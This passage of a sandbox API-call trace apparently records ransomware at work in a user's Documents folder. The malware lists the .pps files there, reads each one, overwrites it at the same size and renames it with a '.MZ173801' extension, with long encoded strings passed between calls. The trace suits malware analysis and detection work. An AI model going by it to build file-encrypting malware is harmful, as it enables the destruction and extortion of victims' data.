0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.038] GetCurrentThreadId () returned 0x1358 [0122.038] GetCurrentThreadId () returned 0x1358 [0122.038] GetCurrentThreadId () returned 0x1358 [0122.039] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.091] GetCurrentThreadId () returned 0x1358 [0122.091] GetCurrentThreadId () returned 0x1358 [0122.091] GetCurrentThreadId () returned 0x1358 [0122.091] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\r_vOYVV008qvPgkFp.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\r_voyvv008qvpgkfp.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.091] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0122.091] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.091] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x16454 [0122.091] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.091] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x16454, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x16454, lpOverlapped=0x0) returned 1 [0122.093] CloseHandle (hObject=0x3d0) returned 1 [0122.094] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\r_vOYVV008qvPgkFp.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\r_voyvv008qvpgkfp.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.096] WriteFile (in: hFile=0x3d0, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x16454, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x16454, lpOverlapped=0x0) returned 1 [0122.098] CloseHandle (hObject=0x3d0) returned 1 [0122.102] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\r_vOYVV008qvPgkFp.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\r_voyvv008qvpgkfp.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\r_vOYVV008qvPgkFp.pps.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\r_voyvv008qvpgkfp.pps.mz173801")) returned 1 [0122.102] GetCurrentThreadId () returned 0x1358 [0122.102] GetCurrentThreadId () returned 0x1358 [0122.102] GetCurrentThreadId () returned 0x1358 [0122.102] GetCurrentThreadId () returned 0x1358 [0122.102] GetCurrentThreadId () returned 0x1358 [0122.102] GetCurrentThreadId () returned 0x1358 [0122.103] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73cb4660, ftCreationTime.dwHighDateTime=0x1d5e5e9, ftLastAccessTime.dwLowDateTime=0x976a7bd0, ftLastAccessTime.dwHighDateTime=0x1d5e919, ftLastWriteTime.dwLowDateTime=0x976a7bd0, ftLastWriteTime.dwHighDateTime=0x1d5e919, nFileSizeHigh=0x0, nFileSizeLow=0x13751, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="T1F3rLNHQkV.pps", cAlternateFileName="T1F3RL~1.PPS")) returned 1 [0122.103] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.103] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.103] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\T1F3rLNHQkV.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\t1f3rlnhqkv.pps"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73cb4660, ftCreationTime.dwHighDateTime=0x1d5e5e9, ftLastAccessTime.dwLowDateTime=0x976a7bd0, ftLastAccessTime.dwHighDateTime=0x1d5e919, ftLastWriteTime.dwLowDateTime=0x976a7bd0, ftLastWriteTime.dwHighDateTime=0x1d5e919, nFileSizeHigh=0x0, nFileSizeLow=0x13751)) returned 1 [0122.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.103] GetCurrentThreadId () returned 0x1358 [0122.103] GetCurrentThreadId () returned 0x1358 [0122.103] GetCurrentThreadId () returned 0x1358 [0122.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.104] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.104] GetCurrentThreadId () returned 0x1358 [0122.104] GetCurrentThreadId () returned 0x1358 [0122.104] GetCurrentThreadId () returned 0x1358 [0122.104] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\T1F3rLNHQkV.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\t1f3rlnhqkv.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.104] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0122.104] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.105] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x13751 [0122.105] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0122.105] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x13751, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x13751, lpOverlapped=0x0) returned 1 [0122.106] CloseHandle (hObject=0x3d0) returned 1 [0122.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\T1F3rLNHQkV.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\t1f3rlnhqkv.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0122.108] WriteFile (in: hFile=0x3d0, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x13751, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0x13751, lpOverlapped=0x0) returned 1 [0122.111] CloseHandle (hObject=0x3d0) returned 1 [0122.114] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\T1F3rLNHQkV.pps" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\t1f3rlnhqkv.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\T1F3rLNHQkV.pps.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\t1f3rlnhqkv.pps.mz173801")) returned 1 [0122.114] GetCurrentThreadId () returned 0x1358 [0122.114] GetCurrentThreadId () returned 0x1358 [0122.114] GetCurrentThreadId () returned 0x1358 [0122.114] GetCurrentThreadId () returned 0x1358 [0122.114] GetCurrentThreadId () returned 0x1358 [0122.114] GetCurrentThreadId () returned 0x1358 [0122.114] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xc8a0c070, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0xc8a0c070, ftLastWriteTime.dwHighDateTime=0x1d5e210, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WjAE", cAlternateFileName="")) returned 1 [0122.114] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xc8a0c070, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0xc8a0c070, ftLastWriteTime.dwHighDateTime=0x1d5e210, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WjAE", cAlternateFileName="")) returned 0 [0122.114] GetLastError () returned 0x12 [0122.114] FindClose (in: hFindFile=0xa1bb28 | out: hFindFile=0xa1bb28) returned 1 [0122.115] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fc4990, ftCreationTime.dwHighDateTime=0x1d5f126, ftLastAccessTime.dwLowDateTime=0xaa0e7945, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa0e7945, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bc40 [0122.115] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0122.115] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.115] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fc4990, ftCreationTime.dwHighDateTime=0x1d5f126, ftLastAccessTime.dwLowDateTime=0xaa0e7945, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa0e7945, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0122.115] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.115] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.115] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392c0e0, ftCreationTime.dwHighDateTime=0x1d5ef02, ftLastAccessTime.dwLowDateTime=0x913a31f0, ftLastAccessTime.dwHighDateTime=0x1d5e7fd, ftLastWriteTime.dwLowDateTime=0xa9f1d98c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xe74c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="0A6m BP4.rtf.MZ173801", cAlternateFileName="0A6MBP~1.MZ1")) returned 1 [0122.115] FileTimeToLocalFileTime (in: 